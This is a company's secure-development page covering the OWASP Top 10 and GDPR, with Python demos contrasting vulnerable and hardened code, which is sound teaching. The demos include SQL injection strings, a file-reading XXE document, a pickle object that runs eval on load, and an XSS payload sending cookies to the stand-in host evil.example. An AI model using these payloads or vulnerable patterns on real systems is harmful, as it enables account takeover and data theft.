Secure development practices are key to the success of any software product. Shipping with no security is bound to produce a damaging outcome in the long run and to lose customer trust. Exposing customers' personally identifiable information to attackers costs sales and market value and can result in legal action from the client's own customers. At Codegic all of our projects and products are developed with security in mind. Our software development is guided by two main frameworks:

  • OWASP Top 10
  • GDPR

OWASP Top 10

The Open Web Application Security Project (OWASP) is a non-profit, community-driven initiative of industry and academia that publishes guidance for defending the confidentiality, integrity and availability of web applications against attackers. Its Top 10 list identifies the ten most critical categories of risk that attackers use to compromise software systems. The OWASP Top 10 (2017 edition) includes:

Injection

This attack lets an attacker supply input that is interpreted as part of a query or command rather than as data, e.g. SQL injection, where crafted input changes the SQL statement the application executes.
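
As an added illustration (not code from this page or from Codegic's products), the following Python example runs a login query against a constructed in-memory SQLite table, first with string formatting and then with a parameterised query. The table contents, account names and the two payload strings are all constructed for the demo; passwords are stored in clear only to keep the injection point visible.

```python
import sqlite3


def make_db():
    """Constructed demo database: two accounts in an in-memory SQLite table.
    Passwords are stored in clear only to keep the injection demo short."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "alice-pw", "admin"),
        ("bob", "bob-pw", "user"),
    ])
    return conn


def login_vulnerable(conn, username, password):
    """Builds the statement by string formatting, so user input becomes SQL grammar."""
    sql = ("SELECT username, role FROM users "
           "WHERE username = '%s' AND password = '%s'" % (username, password))
    return conn.execute(sql).fetchone()


def login_safe(conn, username, password):
    """Parameterised query: the driver binds the values separately, so they can
    never be parsed as SQL no matter which characters they contain."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


# Two classic payloads (constructed). The first comments out the password check,
# the second makes the WHERE clause always true.
COMMENT_OUT = "alice'--"
ALWAYS_TRUE = "' OR '1'='1"


if __name__ == "__main__":
    conn = make_db()
    print(login_vulnerable(conn, COMMENT_OUT, "wrong"))      # ('alice', 'admin')
    print(login_vulnerable(conn, ALWAYS_TRUE, ALWAYS_TRUE))  # first row, no password known
    print(login_safe(conn, COMMENT_OUT, "wrong"))            # None
```

The safe variant treats `alice'--` as a literal user name and finds nothing; the vulnerable one logs the attacker in as the admin without a password. The same rule applies to ORMs and stored procedures: any API that accepts a pre-built SQL string from user data is the vulnerable path.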

Broken Authentication

Weaknesses in login, session management or credential storage let an attacker take over accounts, e.g. through credential stuffing, password brute force or stolen session tokens.

Sensitive Data Exposure

Data that should be protected is exposed to the attacker, e.g. passwords stored unhashed, or keys and card data transmitted or stored without encryption.
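
The two items above meet in password storage: a leaked table of fast, unsalted hashes is as good as a leaked table of passwords, and it feeds the credential stuffing described under Broken Authentication. The following Python example is added here for illustration and is not Codegic's code; it contrasts an unsalted SHA-256 with salted PBKDF2-HMAC-SHA256 using only the standard library. The iteration count follows the current OWASP recommendation for PBKDF2-SHA256; the storage format string is an assumption chosen for the demo.

```python
import hashlib
import hmac
import os

ITERATIONS = 600_000   # OWASP's current minimum for PBKDF2-HMAC-SHA256


def insecure_hash(password: str) -> str:
    """Unsalted fast hash: identical passwords give identical hashes, and a
    leaked table is cracked quickly with precomputed tables or GPUs."""
    return hashlib.sha256(password.encode()).hexdigest()


def hash_password(password: str) -> str:
    """Salted, slow, one-way: safe to store even if the users table leaks.
    Output format (assumed for this demo): algorithm$iterations$salt$digest."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS, dklen=32)
    return "pbkdf2_sha256$%d$%s$%s" % (ITERATIONS, salt.hex(), digest.hex())


def verify_password(password: str, stored: str) -> bool:
    """Recomputes the digest with the stored salt and parameters and compares
    in constant time, so the comparison cannot leak how many bytes matched."""
    try:
        alg, iterations, salt_hex, digest_hex = stored.split("$")
        expected = bytes.fromhex(digest_hex)
        salt = bytes.fromhex(salt_hex)
    except ValueError:
        return False
    if alg != "pbkdf2_sha256":
        return False
    actual = hashlib.pbkdf2_hmac("sha256", password.encode(), salt,
                                 int(iterations), dklen=len(expected))
    return hmac.compare_digest(actual, expected)


if __name__ == "__main__":
    record = hash_password("correct horse battery staple")
    print(record)
    print(verify_password("correct horse battery staple", record))   # True
    print(verify_password("wrong", record))                          # False
```

Storing the iteration count with each record allows it to be raised later and old records re-hashed at next login. Password hashing protects the stored secret; it does not replace rate limiting and lockout on the login endpoint, which is what stops online guessing.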

XML External Entities (XXE)

Older or badly configured XML parsers resolve external entity declarations in incoming XML, letting an attacker read local files, reach internal services, or exhaust resources through entity expansion.
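
To show the mechanism concretely, the following Python example (added here for illustration, not code from Codegic) builds a constructed XXE document that declares an external entity pointing at a temporary file, then parses it twice with the standard-library expat parser. The first parser installs a resolver that fetches whatever SYSTEM URI the document names, which is what many XML libraries do by default; the second refuses any DOCTYPE before an entity can be declared. The secret file content and the document layout are constructed for the demo.

```python
import os
import tempfile
import xml.parsers.expat
from pathlib import Path
from urllib.parse import urlparse


class DoctypeForbidden(Exception):
    """Raised by the hardened parser when the document carries a DTD."""


def build_xxe_document(target_uri: str) -> str:
    """Constructed attacker payload: declares an external entity that points at a
    file and references it in content, so the file's bytes land in the parsed text."""
    return ('<?xml version="1.0"?>\n'
            '<!DOCTYPE order [ <!ENTITY xxe SYSTEM "%s"> ]>\n'
            '<order><note>&xxe;</note></order>' % target_uri)


def parse_with_naive_resolver(xml_text: str) -> str:
    """Returns the document's text content, resolving external entities by reading
    whatever SYSTEM URI they name. expat only fetches if the application installs
    a resolver, as done here; other parsers do this out of the box."""
    text = []
    p = xml.parsers.expat.ParserCreate()
    p.CharacterDataHandler = text.append

    def resolve(context, base, system_id, public_id):
        path = urlparse(system_id).path          # file:///etc/passwd -> /etc/passwd
        with open(path, "rb") as f:
            data = f.read()
        child = p.ExternalEntityParserCreate(context)
        child.CharacterDataHandler = text.append  # entity text flows into the document
        child.Parse(data, True)
        return 1

    p.ExternalEntityRefHandler = resolve
    p.Parse(xml_text, True)
    return "".join(text)


def parse_hardened(xml_text: str) -> str:
    """Same extraction, but refuses any DOCTYPE before a single entity can be
    declared. This blocks external entities and internal 'billion laughs' expansion."""
    text = []
    p = xml.parsers.expat.ParserCreate()
    p.CharacterDataHandler = text.append

    def forbid(doctype_name, system_id, public_id, has_internal_subset):
        raise DoctypeForbidden("DTD/DOCTYPE not accepted: %s" % doctype_name)

    p.StartDoctypeDeclHandler = forbid
    p.Parse(xml_text, True)
    return "".join(text)


def demo():
    """Creates a secret file, attacks both parsers and reports what each yields."""
    fd, path = tempfile.mkstemp()
    os.write(fd, b"secret-token-123")          # constructed secret
    os.close(fd)
    try:
        doc = build_xxe_document(Path(path).as_uri())
        leaked = parse_with_naive_resolver(doc)
        try:
            parse_hardened(doc)
            rejected = False
        except DoctypeForbidden:
            rejected = True
    finally:
        os.remove(path)
    return leaked, rejected


if __name__ == "__main__":
    print(demo())   # ('secret-token-123', True)
```

Disabling DTDs entirely, as the hardened parser does, is the OWASP-recommended fix where the application does not need them. Where DTDs are required, disable only external entity resolution and external DTD loading in the parser's settings, and keep expansion limits on.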

Broken Access control

Users act outside their intended permissions: reading another user's records by changing an identifier in the request (horizontal escalation) or reaching administrative functions (vertical escalation).
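
The following Python example is added here to illustrate both forms of escalation and is not code from Codegic's products. It models an invoice lookup where the identifier comes from the URL: the vulnerable handler only checks that someone is logged in, while the hardened handlers route every decision through one deny-by-default policy. Users, roles and invoice records are constructed for the demo.

```python
from dataclasses import dataclass


class Forbidden(Exception):
    pass


@dataclass(frozen=True)
class User:
    id: int
    role: str   # "user" or "admin"; read from the server-side session, never from the request


# Constructed data: invoices keyed by id, each belonging to one user.
INVOICES = {
    101: {"owner_id": 1, "total": 42.0},
    102: {"owner_id": 2, "total": 99.0},
}


def get_invoice_vulnerable(current, invoice_id):
    """Checks only that someone is logged in. The id comes straight from the URL, so
    user 1 reads invoice 102 just by changing the number (horizontal escalation)."""
    if current is None:
        raise Forbidden("login required")
    return INVOICES[invoice_id]


def authorize(current, action, invoice):
    """Deny-by-default policy evaluated in one place for every handler. Returns True
    only for an explicitly allowed (role, action, ownership) combination."""
    if current is None or invoice is None:
        return False
    if current.role == "admin":
        return True                                   # admins may read and void anything
    return action == "read" and invoice["owner_id"] == current.id


def get_invoice(current, invoice_id):
    invoice = INVOICES.get(invoice_id)
    # A missing invoice and someone else's invoice produce the same error,
    # so valid ids cannot be enumerated by probing.
    if not authorize(current, "read", invoice):
        raise Forbidden("invoice not available")
    return invoice


def void_invoice(current, invoice_id):
    """Administrative action: a plain user reaching it would be vertical escalation."""
    invoice = INVOICES.get(invoice_id)
    if not authorize(current, "void", invoice):
        raise Forbidden("invoice not available")
    return {**invoice, "total": 0.0}


if __name__ == "__main__":
    alice, root = User(1, "user"), User(9, "admin")
    print(get_invoice_vulnerable(alice, 102))   # someone else's invoice
    print(get_invoice(alice, 101))              # her own invoice
    print(void_invoice(root, 102))              # admin-only action
```

The point of the single `authorize` function is that a handler cannot forget the check without it being obvious in review; the role must come from the server-side session, since a role carried in a cookie or hidden field is itself attacker-controlled.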

Insufficient logging and monitoring

Without adequate logging and monitoring, attacks in progress go undetected, breaches are discovered late, and there is no audit trail for incident response.
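
What "monitoring" means in practice is a detection that runs over the logs. The following Python example is added here as an illustration and is not Codegic's code: it parses a constructed authentication log (the line format, hosts and timestamps are invented for the demo) and raises an alert when one IP address accumulates failed logins inside a time window, plus a second alert when a success follows such a burst from the same address.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log: one address fails repeatedly against alice, then succeeds.
SAMPLE_LOG = """\
2024-03-01T10:00:01Z auth: FAILED user=alice ip=203.0.113.7
2024-03-01T10:00:04Z auth: OK user=bob ip=198.51.100.2
2024-03-01T10:00:09Z auth: FAILED user=alice ip=203.0.113.7
2024-03-01T10:00:15Z auth: FAILED user=alice ip=203.0.113.7
2024-03-01T10:00:22Z auth: FAILED user=alice ip=203.0.113.7
2024-03-01T10:00:30Z auth: FAILED user=alice ip=203.0.113.7
2024-03-01T10:00:41Z auth: OK user=alice ip=203.0.113.7
2024-03-01T10:30:00Z auth: FAILED user=carol ip=198.51.100.2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) auth: (?P<result>OK|FAILED) user=(?P<user>\S+) ip=(?P<ip>\S+)$")


def parse_line(line):
    """Returns a dict with ts/result/user/ip, or None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ev


def detect(lines, threshold=5, window=timedelta(minutes=5)):
    """Returns (kind, ip, user, timestamp) alerts:
      brute_force            one IP reaches `threshold` failures inside `window`
      success_after_failures a login succeeds from an IP that is currently over the
                             threshold, i.e. the guessing probably worked."""
    alerts = []
    recent = defaultdict(deque)   # ip -> timestamps of failures inside the window
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        q = recent[ev["ip"]]
        while q and ev["ts"] - q[0] > window:     # slide the window forward
            q.popleft()
        if ev["result"] == "FAILED":
            q.append(ev["ts"])
            if len(q) == threshold:               # fires at the moment the line is crossed
                alerts.append(("brute_force", ev["ip"], ev["user"], ev["ts"]))
        elif len(q) >= threshold:
            alerts.append(("success_after_failures", ev["ip"], ev["user"], ev["ts"]))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

The detection only works because each log line carries the outcome, the account and the source address with a timestamp; an application that logs "login error" without those fields cannot support it. The second alert is the one worth paging on, since it indicates a probable account takeover rather than mere noise.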

Security Misconfigurations

Default accounts, verbose error messages, unnecessary or unpatched features, and insecure settings in any layer of the stack (OS, database, web server, framework) give an attacker a way into the system.

Cross Site Scripting (XSS)

Untrusted input rendered into a page without escaping lets an attacker run script, e.g. JavaScript, in victims' browsers, stealing session cookies or user data.
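
The following Python example is added to illustrate server-side output encoding and is not code from Codegic's products. It renders a greeting with a user-supplied name and link, first by string concatenation and then with context-appropriate handling: HTML escaping for the text, and a scheme allow list for the link, because a `javascript:` URL contains no HTML metacharacters and survives escaping intact. The payload strings are constructed for the demo.

```python
import html
from urllib.parse import urlparse


def render_vulnerable(display_name: str, homepage: str) -> str:
    """Concatenates untrusted values straight into the HTML."""
    return '<p>Hello %s! <a href="%s">your page</a></p>' % (display_name, homepage)


def safe_url(url: str) -> str:
    """Escaping cannot neutralise a javascript: URL inside an href, since no HTML
    metacharacters are involved, so the scheme is checked against an allow list
    and anything else is replaced by an inert link."""
    if urlparse(url).scheme.lower() not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def render_safe(display_name: str, homepage: str) -> str:
    """Escapes text for the element context and validates the URL for the href context."""
    return '<p>Hello %s! <a href="%s">your page</a></p>' % (
        html.escape(display_name, quote=True), safe_url(homepage))


# Constructed payloads: a script injection and a URL-based one.
SCRIPT_PAYLOAD = '<script>location="https://evil.example/?c="+document.cookie</script>'
URL_PAYLOAD = "javascript:alert(document.cookie)"


if __name__ == "__main__":
    print(render_vulnerable(SCRIPT_PAYLOAD, URL_PAYLOAD))   # script and javascript: link intact
    print(render_safe(SCRIPT_PAYLOAD, URL_PAYLOAD))         # escaped text, href="#"
```

In a real application this encoding belongs in the template engine with auto-escaping enabled, and a Content-Security-Policy header that disallows inline script limits the damage when an encoding mistake slips through.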

Insecure Deserialization

Deserializing attacker-controlled data lets the attacker tamper with serialized objects to elevate privileges or, in many serialization formats, to execute arbitrary code.
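
The following Python example is added here for illustration and is not Codegic's code. It shows a session cookie implemented as a pickled object, a constructed attacker object whose unpickling calls `eval`, and a hardened replacement that stores plain JSON protected by an HMAC so that a tampered role is detected before any field is trusted. The secret key and field names are assumptions for the demo.

```python
import base64
import binascii
import hashlib
import hmac
import json
import pickle


# ---- the vulnerable side: a session cookie that is a pickled object ----

def load_session_vulnerable(cookie: str):
    """pickle.loads executes whatever constructors and callables the bytes describe."""
    return pickle.loads(base64.b64decode(cookie))


class Exploit:
    """Constructed attacker object: pickle serializes it as 'call eval("3*7")'.
    Any importable callable (os.system, subprocess.call, ...) could stand in for eval."""
    def __reduce__(self):
        return (eval, ("3*7",))


def attacker_cookie() -> str:
    return base64.b64encode(pickle.dumps(Exploit())).decode()


# ---- the hardened side: plain JSON, integrity-protected with an HMAC ----

SECRET_KEY = b"constructed-demo-key-do-not-reuse"   # production: random, from a secret store
VALID_ROLES = {"user", "admin"}


def _encode(session: dict) -> bytes:
    return json.dumps(session, sort_keys=True, separators=(",", ":")).encode()


def dump_session(session: dict) -> str:
    payload = _encode(session)
    tag = hmac.new(SECRET_KEY, payload, hashlib.sha256).hexdigest()
    return base64.urlsafe_b64encode(payload).decode() + "." + tag


def load_session(cookie: str) -> dict:
    """Verifies the tag before parsing, then validates the fields the app relies on."""
    try:
        payload_b64, tag = cookie.split(".", 1)
        payload = base64.urlsafe_b64decode(payload_b64)
    except (ValueError, binascii.Error):
        raise ValueError("malformed session")
    expected = hmac.new(SECRET_KEY, payload, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("session tampered with or not issued by us")
    session = json.loads(payload)                 # JSON yields only dicts, lists and scalars
    if not isinstance(session, dict) or session.get("role") not in VALID_ROLES \
            or not isinstance(session.get("user"), str):
        raise ValueError("session fields invalid")
    return session


def forge_role(cookie: str, new_role: str) -> str:
    """What an attacker who can edit the cookie but lacks the key would try."""
    payload_b64, tag = cookie.split(".", 1)
    session = json.loads(base64.urlsafe_b64decode(payload_b64))
    session["role"] = new_role
    return base64.urlsafe_b64encode(_encode(session)).decode() + "." + tag


if __name__ == "__main__":
    print(load_session_vulnerable(attacker_cookie()))        # 21: eval ran during loads
    cookie = dump_session({"user": "bob", "role": "user"})
    print(load_session(cookie))                              # {'role': 'user', 'user': 'bob'}
    try:
        load_session(forge_role(cookie, "admin"))
    except ValueError as e:
        print("rejected:", e)
```

Two things make the hardened version safe: the format cannot express code, only data, and nothing is parsed until the tag proves the server produced it. The same applies to Java, PHP and .NET native serialization, where the fix is likewise to avoid deserializing untrusted input rather than to filter classes after the fact.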

Using Components with known vulnerabilities

Libraries, frameworks and other components with known vulnerabilities that are not patched or updated can be exploited directly; the application is only as secure as its weakest dependency.

GDPR

The General Data Protection Regulation is an EU law on data protection and privacy for all individuals in the European Union and the European Economic Area. It is the most important change in data privacy regulation in 20 years.

Consent

Consent cannot be implicit and must be given clearly. The request for consent must state the purpose for which the personal data is collected or processed. A privacy policy must be available and must not be written in dense legal jargon. Withdrawing consent must be as easy as giving it.

Right to be Forgotten

This is the right of a data subject to have the data controller erase their personal data and cease further processing. It also applies to processors working on behalf of controllers.

Data Portability

This is the right to receive one's personal data in a commonly used, machine-readable format so that it can be transferred to another controller.

Increased Scope

GDPR applies to all companies processing the personal data of data subjects residing in the European Union, irrespective of where the company is located, so it covers both EU and non-EU companies. In the cases defined by the regulation (public authorities, and organisations whose core activities involve large-scale regular monitoring of individuals or large-scale processing of special categories of data) a data protection officer must also be appointed.

Breach Notification

The supervisory authority must be notified within 72 hours of becoming aware of a breach. Data processors are also required to notify their customers, the controllers, without undue delay.

Data Protection Officers

A DPO ensures that internal records of processing are properly kept and acts as the single point of contact for supervisory authorities and data subjects.

Right to Access

Data subjects have the right to obtain confirmation from a data controller as to whether their personal data is being processed and, if so, where and for what purpose. Data controllers must also provide a free copy of the personal data, in electronic format, on request.

Privacy by Design

Companies and data controllers must build privacy into systems and solutions from the design stage rather than adding it at the end. This requires effective administrative, technical and physical controls, and processing of personal data only to the extent necessary for the stated purpose (data minimisation).

Penalties

Fines for breaching GDPR can reach 4% of annual global turnover or €20 million, whichever is greater, for the most serious infringements, such as processing personal data without sufficient consent or violating data subjects' rights. A lower tier of up to 2% of annual global turnover or €10 million applies to obligations such as privacy by design, keeping records of processing, notifying the supervisory authority and data subjects of a breach, and conducting data protection impact assessments. These rules apply to both processors and controllers, which means cloud service providers are not exempt from GDPR enforcement.
